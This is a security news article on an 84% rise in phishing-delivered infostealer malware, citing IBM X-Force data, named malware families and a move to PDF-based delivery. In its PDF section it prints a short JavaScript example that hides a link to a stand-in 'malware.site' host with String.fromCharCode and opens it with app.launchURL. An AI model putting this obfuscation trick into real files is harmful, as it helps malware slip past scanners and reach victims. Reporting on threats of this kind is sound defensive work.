Attack Via Infostealers Increased by 84% Via Phishing Emails Per Week

Attack Via Infostealers Increased by 84% Via Phishing Emails Per Week

Cybersecurity researchers have documented an alarming surge in infostealer malware distribution through phishing channels, with weekly delivery volume increasing by 84% in 2024 compared to the previous year.

According to recently released data, this upward trend shows no signs of slowing, with early 2025 figures suggesting an even more dramatic 180% increase in weekly volume compared to 2023 baselines.

This exponential growth signals a fundamental shift in attack methodologies as threat actors increasingly target user credentials rather than deploying traditional backdoor malware.

Google News

Infostealers represent a particularly insidious class of malicious software designed to extract valuable information from compromised systems.

These programs operate silently in the background, capturing screenshots, logging keystrokes, and most critically, harvesting stored credentials from browsers, cryptocurrency wallets, and password managers.

Once exfiltrated, these credentials fuel subsequent attacks, with valid account compromise now tied with exploitation of public-facing applications as the top initial access vector in 30% of security incidents.

The evolution of delivery mechanisms has played a crucial role in the proliferation of these threats. Traditional malicious attachments like ZIP archives and Microsoft Office documents have declined significantly, with malicious ZIP and RAR attachments dropping by 70% and 45% respectively.

Instead, attackers have pivoted toward embedding malicious URLs within seemingly innocuous PDF documents and leveraging trusted cloud platforms to host their malware, effectively circumventing many traditional security controls.

IBM analysts identified AgentTesla as the most prevalent infostealer distributed via phishing emails, followed by FormBook, SnakeKeylogger, and PureLogs Stealer.

Attack Via Infostealers Increased by 84% Via Phishing Emails Per Week
Top five infostealers seen on dark web forums (Source – IBM)

Meanwhile, dark web marketplace analysis revealed a 12% year-over-year increase in infostealer listings, with Lumma dominating the underground economy, followed by RisePro, Vidar, Stealc, and RedLine.

This thriving criminal ecosystem demonstrates the profitability and sustainability of credential harvesting operations.

“Credential harvesting was observed in 28% of all security incidents we responded to in 2024,” noted Charles Henderson, Head of IBM X-Force.

“Often, these stolen credentials allow attackers to remain undetected for extended periods as they move laterally through environments, making detection and remediation exceedingly difficult.”

PDF Obfuscation Techniques: The Hidden Danger

The shift toward PDF-based delivery mechanisms represents one of the most sophisticated evolutions in the infostealer landscape.

Threat actors have embraced PDF files because they are universally trusted document formats with complex structures that can effectively conceal malicious code.

Analysis of malicious PDFs reveals that 42% used obfuscated URLs, 28% hid their URLs in PDF streams, and 7% were delivered in encrypted form with an accompanying password.

The technical sophistication of these obfuscation techniques often involves encoding malicious URLs using methods like hexadecimal representation or JavaScript obfuscation.

For example, a typical obfuscated URL might be encoded as:-

var url = String.fromCharCode(104,116,116,112,115,58,47,47,109,97,108,119,97,114,101,46,115,105,116,101);
app.launchURL(url);

This code translates to a simple “https://malware.Site” when executed but appears harmless to automated scanning systems.

Moreover, threat actors frequently leverage encrypted PDF streams, where content is compressed and encoded, making detection more challenging for traditional security tools.

These PDF-based attacks have particularly targeted Latin American financial institutions, with banking trojans like Grandoreiro, Mekotio, and Guildma being distributed through cloud-hosted infrastructure.

The combination of sophisticated obfuscation techniques, trusted file formats, and legitimate hosting platforms creates a perfect storm for credential theft operations, requiring organizations to implement layered defenses that extend beyond traditional email scanning solutions to include advanced endpoint protection and identity management controls.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy



Source link